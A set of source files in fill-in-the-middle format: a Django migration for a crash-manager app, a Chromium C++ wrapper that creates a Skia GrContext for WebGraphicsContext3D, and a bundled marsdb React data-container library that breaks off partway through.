migrations.AddField( model_name="bugzillatemplate", name="testcase_filename", field=models.TextField(blank=True, default=""), preserve_default=False, ), migrations.AddField( model_name="crashentry", name="triagedOnce", field=models.BooleanField(default=False), ), migrations.AddField( model_name="user", name="restricted", field=models.BooleanField(default=False), ), migrations.CreateModel( name="BucketWatch", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("lastCrash", models.IntegerField(default=0)), ( "bucket", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Bucket", ), ), ( "user", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.User", ), ), ], ), migrations.AddField( model_name="user", name="bucketsWatching", field=models.ManyToManyField( through="crashmanager.BucketWatch", to="crashmanager.Bucket" ), ), migrations.AddField( model_name="bucket", name="optimizedSignature", field=models.TextField(blank=True, null=True), ), migrations.AlterModelOptions( name="user", options={ "permissions": ( ("view_crashmanager", "Can see CrashManager app"), ("view_covmanager", "Can see CovManager app"), ("view_ec2spotmanager", "Can see EC2SpotManager app"), ) }, ), ]<|fim▁end|>
name="comment", field=models.TextField(blank=True, default=""), preserve_default=False, ),
<|file_name|>grcontext_for_webgraphicscontext3d.cc<|end_file_name|><|fim▁begin|>// Copyright (c) 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "webkit/common/gpu/grcontext_for_webgraphicscontext3d.h" #include "third_party/WebKit/public/platform/WebGraphicsContext3D.h" #include "third_party/skia/include/gpu/GrContext.h" #include "third_party/skia/include/gpu/gl/GrGLInterface.h" namespace webkit { namespace gpu { static void BindWebGraphicsContext3DGLContextCallback( const GrGLInterface* interface) { reinterpret_cast<WebKit::WebGraphicsContext3D*>( interface->fCallbackData)->makeContextCurrent(); } GrContextForWebGraphicsContext3D::GrContextForWebGraphicsContext3D( WebKit::WebGraphicsContext3D* context3d) { if (!context3d) return; skia::RefPtr<GrGLInterface> interface = skia::AdoptRef( context3d->createGrGLInterface()); if (!interface) return; interface->fCallback = BindWebGraphicsContext3DGLContextCallback; interface->fCallbackData = reinterpret_cast<GrGLInterfaceCallbackData>(context3d); gr_context_ = skia::AdoptRef(GrContext::Create( kOpenGL_GrBackend, reinterpret_cast<GrBackendContext>(interface.get()))); if (!gr_context_) return; bool nonzero_allocation = true; SetMemoryLimit(nonzero_allocation); } GrContextForWebGraphicsContext3D::~GrContextForWebGraphicsContext3D() { if (gr_context_) gr_context_->contextDestroyed(); } void GrContextForWebGraphicsContext3D::SetMemoryLimit(bool nonzero_allocation) { if (!gr_context_) return;<|fim▁hole|> if (nonzero_allocation) { // The limit of the number of textures we hold in the GrContext's // bitmap->texture cache. static const int kMaxGaneshTextureCacheCount = 2048; // The limit of the bytes allocated toward textures in the GrContext's // bitmap->texture cache. static const size_t kMaxGaneshTextureCacheBytes = 96 * 1024 * 1024; gr_context_->setTextureCacheLimits( kMaxGaneshTextureCacheCount, kMaxGaneshTextureCacheBytes); } else { gr_context_->freeGpuResources(); gr_context_->setTextureCacheLimits(0, 0); } } } // namespace gpu } // namespace webkit<|fim▁end|>
<|file_name|>marsdb.react.js<|end_file_name|><|fim▁begin|>(function(f){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=f()}else if(typeof define==="function"&&define.amd){define([],f)}else{var g;if(typeof window!=="undefined"){g=window}else if(typeof global!=="undefined"){g=global}else if(typeof self!=="undefined"){g=self}else{g=this}(g.Mars || (g.Mars = {})).React = f()}})(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var _react = require('react'); var _react2 = _interopRequireDefault(_react); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } } function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; } function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; } /** * Component for rendering data container */ var DataManagerContainer = function (_React$Component) { _inherits(DataManagerContainer, _React$Component); function DataManagerContainer(props, context) { _classCallCheck(this, DataManagerContainer); var _this = _possibleConstructorReturn(this, Object.getPrototypeOf(DataManagerContainer).call(this, props, context)); _this.state = { result: {} }; _this.query = props.component.getQuery(props.variables); _this.query.on('update', _this._handleDataChanges.bind(_this)); _this._executeQuery(); return _this; } _createClass(DataManagerContainer, [{ key: '_executeQuery', value: function _executeQuery() { var _this2 = this; this._resolved = false; this.query.execute().then(function (result) { _this2._resolved = true; _this2.setState({ result: result }); }); } }, { key: '_handleDataChanges', value: function _handleDataChanges(result) { if (this._resolved) { this.setState({ result: result }); } } }, { key: 'componentWillUnmount', value: function componentWillUnmount() { this.query.stop(); } }, { key: 'componentWillReceiveProps', value: function componentWillReceiveProps(nextProps) { this.query.updateVariables(nextProps); } }, { key: 'renderLoading', value: function renderLoading() { return this.props.renderLoading(); } }, { key: 'render', value: function render() { var Component = this.props.component; // eslint-disable-line return this._resolved ? _react2.default.createElement(Component, _extends({}, this.props, this.state.result)) : this.renderLoading(); } }]); return DataManagerContainer; }(_react2.default.Component); DataManagerContainer.defaultProps = { renderLoading: function renderLoading() { return null; } }; exports.default = DataManagerContainer; },{"react":undefined}],2:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var _forEach = require('fast.js/forEach'); var _forEach2 = _interopRequireDefault(_forEach); var _map2 = require('fast.js/map'); var _map3 = _interopRequireDefault(_map2); var _keys2 = require('fast.js/object/keys'); var _keys3 = _interopRequireDefault(_keys2); var _marsdb = require('marsdb'); var _invariant = require('invariant'); var _invariant2 = _interopRequireDefault(_invariant); var _utils = require('./utils'); var utils = _interopRequireWildcard(_utils); function _interopRequireWildcard(obj) { if (obj && obj.__esModule) { return obj; } else { var newObj = {}; if (obj != null) { for (var key in obj) { if (Object.prototype.hasOwnProperty.call(obj, key)) newObj[key] = obj[key]; } } newObj.default = obj; return newObj; } } function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } } function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; } function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; } /** * ExecutionContext is used to track changes of variables * and cursors and cleanup listeners on parent cursor changes. * It also provides a method to run a function "in context": * while function running, `ExecutionContext.getCurrentContext()` * returning the context. */ var ExecutionContext = function (_EventEmitter) { _inherits(ExecutionContext, _EventEmitter); function ExecutionContext() { var variables = arguments.length <= 0 || arguments[0] === undefined ? new Map() : arguments[0]; _classCallCheck(this, ExecutionContext); var _this = _possibleConstructorReturn(this, Object.getPrototypeOf(ExecutionContext).call(this)); _this.variables = variables; _this.emitCleanup = _this.emitCleanup.bind(_this); return _this; } /** * Adds a cleanup event listener and return a funtion * for removing listener. * @param {Function} fn * @return {Function} */ _createClass(ExecutionContext, [{ key: 'addCleanupListener', value: function addCleanupListener(fn) { var _this2 = this; this.on('cleanup', fn); return function () { return _this2.removeListener('cleanup', fn); }; } /** * Emits cleanup event. Given argument indicates the source * of the event. If it is `false`, then the event will be * interprated as "went from upper context". * @param {Boolean} isRoot */ }, { key: 'emitCleanup', value: function emitCleanup() { var isRoot = arguments.length <= 0 || arguments[0] === undefined ? true : arguments[0]; this.emit('cleanup', isRoot); } /** * Creates a child context, that have the same map of variables. * Set context cleanup listener for propagating the event to the child. * Return child context object. * @return {ExecutionContext} */ }, { key: 'createChildContext', value: function createChildContext() { var newContext = new ExecutionContext(this.variables); var stopper = this.addCleanupListener(function (isRoot) { newContext.emitCleanup(false); if (!isRoot) { stopper(); } }); return newContext; } /** * Execute given function "in context": set the context * as globally active with saving of previous active context, * and execute a function. While function executing * `ExecutionContext.getCurrentContext()` will return the context. * At the end of the execution it puts previous context back. * @param {Function} fn */ }, { key: 'withinContext', value: function withinContext(fn) { var prevContext = ExecutionContext.getCurrentContext(); ExecutionContext.__currentContext = this; try { return fn(); } finally { ExecutionContext.__currentContext = prevContext; } } /** * By given container class get variables from * the context and merge it with given initial values * and variables mapping. Return the result of the merge. * @param {Class} containerClass * @param {OBject} initVars * @param {Object} mapVars * @return {Object} */ }, { key: 'getVariables', value: function getVariables(containerClass) { var initVars = arguments.length <= 1 || arguments[1] === undefined ? {} : arguments[1]; var mapVars = arguments.length <= 2 || arguments[2] === undefined ? {} : arguments[2]; var prepareVariables = arguments.length <= 3 || arguments[3] === undefined ? null : arguments[3]; var contextVars = this.variables.get(containerClass); if (!contextVars) { contextVars = {}; this.variables.set(containerClass, contextVars); } for (var k in initVars) { if (contextVars[k] === undefined) { if (mapVars[k] !== undefined) { (0, _invariant2.default)(utils._isProperty(mapVars[k]), 'You can pass to a mapping only parent variables'); contextVars[k] = mapVars[k]; } else { contextVars[k] = utils._createProperty(initVars[k]); } } } if (prepareVariables && !contextVars.promise) { Object.defineProperty(contextVars, 'promise', { value: Promise.resolve(prepareVariables(contextVars)), configurable: true }); } return contextVars; } /** * Track changes of given variable and regenerate value * on change. It also listen to context cleanup event * for stop variable change listeners * @param {Property} prop * @param {Object} vars * @param {Function} valueGenerator */ }, { key: 'trackVariablesChange', value: function trackVariablesChange(prop, vars, valueGenerator) { var _this3 = this; var updater = function updater() { _this3.emitCleanup(); if (prop.promise && prop.promise.stop) { prop.promise.stop(); } var nextValue = _this3.withinContext(function () { return valueGenerator(vars); }); if (utils._isCursor(nextValue)) { _this3.trackCursorChange(prop, nextValue); prop.emitChange(); } else if (!utils._isProperty(nextValue)) { prop(nextValue); } else { // Variables tracking must be used only vhen valueGenerator // returns a Cursor or any type except Property. throw new Error('Next value can\'t be a property'); } }; var varTrackers = (0, _map3.default)((0, _keys3.default)(vars), function (k) { return vars[k].addChangeListener(updater); }); var stopper = this.addCleanupListener(function (isRoot) { if (!isRoot) { (0, _forEach2.default)(varTrackers, function (stop) { return stop(); }); stopper(); } }); } /** * Observe given cursor for changes and set new * result in given property. Also tracks context * cleanup event for stop observers * @param {Property} prop * @param {Cursor} cursor */ }, { key: 'trackCursorChange', value: function trackCursorChange(prop, cursor) { var _this4 = this; if (prop.removeCursorTracker) { prop.removeCursorTracker(); } var observer = function observer(result) { if (Array.isArray(result)) { result = (0, _map3.default)(result, function (x) { return utils._createPropertyWithContext(x, _this4); }); } prop(result); }; cursor.on('cursorChanged', this.emitCleanup); prop.promise = cursor.observe(observer); prop.removeCursorTracker = function () { cursor.removeListener('cursorChanged', _this4.emitCleanup); prop.promise.stop(); }; var stopper = this.addCleanupListener(function (isRoot) { if (!isRoot) { prop.removeCursorTracker(); stopper(); } }); } /** * Returns a current active context, set by `withinContext` * @return {ExecutionContext} */ }], [{ key: 'getCurrentContext', value: function getCurrentContext() { return ExecutionContext.__currentContext; } }]); return ExecutionContext; }(_marsdb.EventEmitter); exports.default = ExecutionContext; },{"./utils":5,"fast.js/forEach":9,"fast.js/map":11,"fast.js/object/keys":14,"invariant":16,"marsdb":undefined}],3:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var _keys2 = require('fast.js/object/keys'); var _keys3 = _interopRequireDefault(_keys2); var _forEach = require('fast.js/forEach'); var _forEach2 = _interopRequireDefault(_forEach); var _map2 = require('fast.js/map'); var _map3 = _interopRequireDefault(_map2); var _marsdb = require('marsdb'); var _invariant = require('invariant'); var _invariant2 = _interopRequireDefault(_invariant); var _ExecutionContext = require('./ExecutionContext'); var _ExecutionContext2 = _interopRequireDefault(_ExecutionContext); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } } function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; } function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; } /** * By given frgments object, varialbes and containerClass * creates a query executor. * It will execute each fragment of fragments object and * return a promise, that will be resolved when all fragments * is filled with data. * * Container class is an object with one static function – `getFragment`, * that must return a property function. By all properties constructed * a Promise that resolved when all `prop.promise` resolved. * * The class extends `EventEmitter`.Only one event may be emitted – `update`. * The event emitted when query data is updated. With event is arrived an object * of proprties for each fragment. */ var QueryExecutor = function (_EventEmitter) { _inherits(QueryExecutor, _EventEmitter); function QueryExecutor(fragments, initVarsOverride, containerClass, prepareVariables) { _classCallCheck(this, QueryExecutor); var _this = _possibleConstructorReturn(this, Object.getPrototypeOf(QueryExecutor).call(this)); _this.containerClass = containerClass; _this.fragmentNames = (0, _keys3.default)(fragments); _this.initVarsOverride = initVarsOverride; _this.context = new _ExecutionContext2.default(); _this.variables = _this.context.getVariables(containerClass, initVarsOverride, {}, prepareVariables); _this._handleDataChanges = (0, _marsdb.debounce)(_this._handleDataChanges.bind(_this), 1000 / 60, 5); return _this; } /** * Change a batch size of updater. * Btach size is a number of changes must be happen * in debounce interval to force execute debounced * function (update a result, in our case) * * @param {Number} batchSize * @return {CursorObservable} */ _createClass(QueryExecutor, [{ key: 'batchSize', value: function batchSize(_batchSize) { this._handleDataChanges.updateBatchSize(_batchSize); return this; } /** * Change debounce wait time of the updater * @param {Number} waitTime * @return {CursorObservable} */ }, { key: 'debounce', value: function debounce(waitTime) { this._handleDataChanges.updateWait(waitTime); return this; } /** * Execute the query and return a Promise, that resolved * when all props will be filled with data. * If query already executing it just returns a promise * for currently executing query. * @return {Promise} */ }, { key: 'execute', value: function execute() { var _this2 = this; if (!this._execution) { (function () { _this2.result = {}; _this2.context.withinContext(function () { (0, _forEach2.default)(_this2.fragmentNames, function (k) { _this2.result[k] = _this2.containerClass.getFragment(k); }); }); var updater = function updater() { _this2._execution = _this2._handleDataChanges(); }; _this2._stoppers = (0, _map3.default)(_this2.fragmentNames, function (k) { return _this2.result[k].addChangeListener(updater); }); updater(); })(); } return this._execution; } /** * Stops query executing and listening for changes. * Returns a promise resolved when query stopped. * @return {Promise} */ }, { key: 'stop', value: function stop() { var _this3 = this; (0, _invariant2.default)(this._execution, 'stop(...): query is not executing'); // Remove all update listeners synchronously to avoid // updates of old data this.removeAllListeners(); return this._execution.then(function () { (0, _forEach2.default)(_this3._stoppers, function (stop) { return stop(); }); _this3.context.emitCleanup(); _this3._execution = null; }); } /** * Update top level variables of the query by setting * values in variable props from given object. If field * exists in a given object and not exists in variables map * then it will be ignored. * @param {Object} nextProps * @return {Promise} resolved when variables updated */ }, { key: 'updateVariables', value: function updateVariables(nextProps) { var _this4 = this; (0, _invariant2.default)(this._execution, 'updateVariables(...): query is not executing'); return this._execution.then(function () { var updated = false; (0, _forEach2.default)(nextProps, function (prop, k) { if (_this4.variables[k] && _this4.variables[k]() !== prop) { _this4.variables[k](prop); updated = true; } }); return updated; }); } /** * The method is invoked when some of fragment's property is updated. * It emits an `update` event only when all `prop.promise` is resolved. */ }, { key: '_handleDataChanges', value: function _handleDataChanges() { var _this5 = this; var nextPromises = (0, _map3.default)(this.fragmentNames, function (k) { return _this5.result[k].promise; }); var resultPromise = Promise.all(nextPromises).then(function () { if (_this5._resultPromise === resultPromise) { _this5.emit('update', _this5.result); } return _this5.result; }, function (error) { _this5.emit('error', error); return _this5.result; }); this._resultPromise = resultPromise; return this._resultPromise; } }]); return QueryExecutor; }(_marsdb.EventEmitter); exports.default = QueryExecutor; },{"./ExecutionContext":2,"fast.js/forEach":9,"fast.js/map":11,"fast.js/object/keys":14,"invariant":16,"marsdb":undefined}],4:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol ? "symbol" : typeof obj; }; var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); exports.default = createContainer; var _keys2 = require('fast.js/object/keys'); var _keys3 = _interopRequireDefault(_keys2); var _assign2 = require('fast.js/object/assign'); var _assign3 = _interopRequireDefault(_assign2); var _react = require('react'); var _react2 = _interopRequireDefault(_react); var _invariant = require('invariant'); var _invariant2 = _interopRequireDefault(_invariant); var _ExecutionContext = require('./ExecutionContext'); var _ExecutionContext2 = _interopRequireDefault(_ExecutionContext); var _QueryExecutor = require('./QueryExecutor'); var _QueryExecutor2 = _interopRequireDefault(_QueryExecutor); var _utils = require('./utils'); var utils = _interopRequireWildcard(_utils); function _interopRequireWildcard(obj) { if (obj && obj.__esModule) { return obj; } else { var newObj = {}; if (obj != null) { for (var key in obj) { if (Object.prototype.hasOwnProperty.call(obj, key)) newObj[key] = obj[key]; } } newObj.default = obj; return newObj; } } function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } } function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; } function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; } /** * High-order data container creator * @param {Component} Component * @param {Object} options.fragments * @param {Object} options.initVars * @return {Component} */ function createContainer(Component, _ref) { var _ref$fragments = _ref.fragments; var fragments = _ref$fragments === undefined ? {} : _ref$fragments; var _ref$initialVariables = _ref.initialVariables; var initialVariables = _ref$initialVariables === undefined ? {} : _ref$initialVariables; var _ref$prepareVariables = _ref.prepareVariables; var prepareVariables = _ref$prepareVariables === undefined ? null : _ref$prepareVariables; var componentName = Component.displayName || Component.name; var containerName = 'Mars(' + componentName + ')'; var fragmentKeys = (0, _keys3.default)(fragments); var Container = function (_React$Component) { _inherits(Container, _React$Component); function Container() { _classCallCheck(this, Container); return _possibleConstructorReturn(this, Object.getPrototypeOf(Container).apply(this, arguments)); } _createClass(Container, [{ key: 'render', value: function render() { var variables = this.props[fragmentKeys[0]].context.getVariables(Container); return _react2.default.createElement(Component, _extends({}, this.props, { variables: variables })); } }], [{ key: 'getFragment', value: function getFragment(name, mapping) { var initVarsOverride = arguments.length <= 2 || arguments[2] === undefined ? {} : arguments[2]; var parentContext = arguments[3]; <|fim▁hole|> var fragment = fragments[name]; var initVars = (0, _assign3.default)({}, initialVariables, initVarsOverride); var vars = childContext.getVariables(Container, initVars, mapping, prepareVariables); (0, _invariant2.default)(typeof fragment === 'function' || (typeof fragment === 'undefined' ? 'undefined' : _typeof(fragment)) === 'object', 'getFragment(...): a fragment must be a function or an object'); if ((typeof fragment === 'undefined' ? 'undefined' : _typeof(fragment)) === 'object') { return utils._getJoinFunction(Container, fragment, vars, childContext); } else { return utils._getFragmentValue(Container, fragment, vars, childContext); } } }, { key: 'getQuery', value: function getQuery() { var initVarsOverride = arguments.length <= 0 || arguments[0] === undefined ? {} : arguments[0]; var initVars = (0, _assign3.default)({}, initialVariables, initVarsOverride); return new _QueryExecutor2.default(fragments, initVars, Container, prepareVariables); } }]); return Container; }(_react2.default.Component); Container.displayName = containerName; return Container; } },{"./ExecutionContext":2,"./QueryExecutor":3,"./utils":5,"fast.js/object/assign":12,"fast.js/object/keys":14,"invariant":16,"react":undefined}],5:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); exports.noop = undefined; var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol ? "symbol" : typeof obj; }; exports._isProperty = _isProperty; exports._isCursor = _isCursor; exports._getFragmentValue = _getFragmentValue; exports._getJoinFunction = _getJoinFunction; exports._createProperty = _createProperty; exports._createPropertyWithContext = _createPropertyWithContext; var _forEach = require('fast.js/forEach'); var _forEach2 = _interopRequireDefault(_forEach); var _map2 = require('fast.js/map'); var _map3 = _interopRequireDefault(_map2); var _keys2 = require('fast.js/object/keys'); var _keys3 = _interopRequireDefault(_keys2); var _marsdb = require('marsdb'); var _CursorObservable = require('marsdb/dist/CursorObservable'); var _CursorObservable2 = _interopRequireDefault(_CursorObservable); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } // Internals var _propertyVersionId = 0; var noop = exports.noop = function noop() {}; // eslint-disable-line /** * Return true if given value is a property * @param {Object} val * @return {Boolean} */ function _isProperty(val) { return typeof val === 'function' && !!val.isProperty; } /** * Return true if given value is a CursorObservable * @param {OBject} val * @return {Boolean} */ function _isCursor(val) { return val instanceof _CursorObservable2.default; } /** * Return a property, that updated when value * of fragment changed or variable changed. It do nothing * if generated value is already a property (just returns * the property). * * @param {Class} containerClass * @param {Function} valueGenerator * @param {Object} vars * @param {ExecutionContext} context * @return {Property} */ function _getFragmentValue(containerClass, valueGenerator, vars, context) { var _createFragmentProp = function _createFragmentProp() { var value = context.withinContext(function () { return valueGenerator(vars); }); var prop = undefined; if (_isProperty(value)) { prop = value; } else { prop = _createPropertyWithContext(null, context); if (_isCursor(value)) { context.trackCursorChange(prop, value); } else { prop(value); } context.trackVariablesChange(prop, vars, valueGenerator); } return prop; }; if (vars.promise) { var _ret = function () { var proxyProp = _createPropertyWithContext(null, context); proxyProp.promise = vars.promise.then(function () { var fragProp = _createFragmentProp(); if (fragProp() !== null) { proxyProp.emitChange(); } proxyProp.proxyTo(fragProp); return fragProp.promise; }); return { v: proxyProp }; }(); if ((typeof _ret === 'undefined' ? 'undefined' : _typeof(_ret)) === "object") return _ret.v; } else { return _createFragmentProp(); } } /** * Return a function that join the result of given joinObj. * @param {Class} containerClass * @param {Object} joinObj * @param {Object} vars * @param {ExecutionContext} context * @return {Function} */ function _getJoinFunction(containerClass, joinObj, vars, context) { var joinObjKeys = (0, _keys3.default)(joinObj); return function (doc) { var updated = arguments.length <= 1 || arguments[1] === undefined ? noop : arguments[1]; if ((typeof doc === 'undefined' ? 'undefined' : _typeof(doc)) === 'object' && doc !== null) { return (0, _map3.default)(joinObjKeys, function (k) { if (doc[k] === undefined) { var _ret2 = function () { var valueGenerator = function valueGenerator(opts) { return joinObj[k](doc, opts); }; var prop = _getFragmentValue(containerClass, valueGenerator, vars, context); doc[k] = prop; return { v: Promise.resolve(prop.promise).then(function (res) { var changeStopper = prop.addChangeListener(updated); var cleanStopper = context.addCleanupListener(function (isRoot) { if (!isRoot) { cleanStopper(); changeStopper(); } }); return res; }) }; }(); if ((typeof _ret2 === 'undefined' ? 'undefined' : _typeof(_ret2)) === "object") return _ret2.v; } }); } }; } /** * Creates a getter-setter property function. * The function returns current value if called without * arguments. If first argument passed then it sets new * value and returns new value. * * On set of a new value it emits a change event. You can * listen on a change event by calling `addChangeListener` * which adds a change event handler that returns a function * for stopping listening. * * A property also have a `version` field. It's a unique value * across all active properties. A version is changed when * property have changed before emitting change event. * * @param {Mixed} initValue * @return {Property} */ function _createProperty(initValue) { var emitter = new _marsdb.EventEmitter(); var store = initValue; var proxyProp = null; var prop = function prop() { if (proxyProp) { return proxyProp.apply(null, arguments); } else { if (arguments.length > 0) { store = arguments[0]; if (arguments.length === 1) { prop.emitChange(); } } return store; } }; prop.emitChange = function () { prop.version = ++_propertyVersionId; emitter.emit('change'); }; prop.addChangeListener = function (func) { emitter.on('change', func); return function () { emitter.removeListener('change', func); }; }; prop.proxyTo = function (toProp) { proxyProp = toProp; Object.defineProperty(prop, 'version', { get: function get() { return toProp.version; }, set: function set(newValue) { return toProp.version = newValue; } }); prop.addChangeListener = toProp.addChangeListener; prop.emitChange = toProp.emitChange; (0, _forEach2.default)(emitter.listeners('change'), function (cb) { return toProp.addChangeListener(cb); }); emitter = toProp.__emitter; store = null; }; prop.version = ++_propertyVersionId; prop.isProperty = true; prop.__emitter = emitter; return prop; } /** * Create a property that holds given value and context. * @param {Mixed} value * @param {ExecutionContext} context * @return {Property} */ function _createPropertyWithContext(value, context) { var nextProp = _createProperty(value); nextProp.context = context; return nextProp; } },{"fast.js/forEach":9,"fast.js/map":11,"fast.js/object/keys":14,"marsdb":undefined,"marsdb/dist/CursorObservable":undefined}],6:[function(require,module,exports){ var createContainer = require('./dist/createContainer').default; var DataManagerContainer = require('./dist/DataManagerContainer').default; module.exports = { __esModule: true, createContainer: createContainer, DataManagerContainer: DataManagerContainer }; },{"./dist/DataManagerContainer":1,"./dist/createContainer":4}],7:[function(require,module,exports){ 'use strict'; var bindInternal3 = require('../function/bindInternal3'); /** * # For Each * * A fast `.forEach()` implementation. * * @param {Array} subject The array (or array-like) to iterate over. * @param {Function} fn The visitor function. * @param {Object} thisContext The context for the visitor. */ module.exports = function fastForEach (subject, fn, thisContext) { var length = subject.length, iterator = thisContext !== undefined ? bindInternal3(fn, thisContext) : fn, i; for (i = 0; i < length; i++) { iterator(subject[i], i, subject); } }; },{"../function/bindInternal3":10}],8:[function(require,module,exports){ 'use strict'; var bindInternal3 = require('../function/bindInternal3'); /** * # Map * * A fast `.map()` implementation. * * @param {Array} subject The array (or array-like) to map over. * @param {Function} fn The mapper function. * @param {Object} thisContext The context for the mapper. * @return {Array} The array containing the results. */ module.exports = function fastMap (subject, fn, thisContext) { var length = subject.length, result = new Array(length), iterator = thisContext !== undefined ? bindInternal3(fn, thisContext) : fn, i; for (i = 0; i < length; i++) { result[i] = iterator(subject[i], i, subject); } return result; }; },{"../function/bindInternal3":10}],9:[function(require,module,exports){ 'use strict'; var forEachArray = require('./array/forEach'), forEachObject = require('./object/forEach'); /** * # ForEach * * A fast `.forEach()` implementation. * * @param {Array|Object} subject The array or object to iterate over. * @param {Function} fn The visitor function. * @param {Object} thisContext The context for the visitor. */ module.exports = function fastForEach (subject, fn, thisContext) { if (subject instanceof Array) { return forEachArray(subject, fn, thisContext); } else { return forEachObject(subject, fn, thisContext); } }; },{"./array/forEach":7,"./object/forEach":13}],10:[function(require,module,exports){ 'use strict'; /** * Internal helper to bind a function known to have 3 arguments * to a given 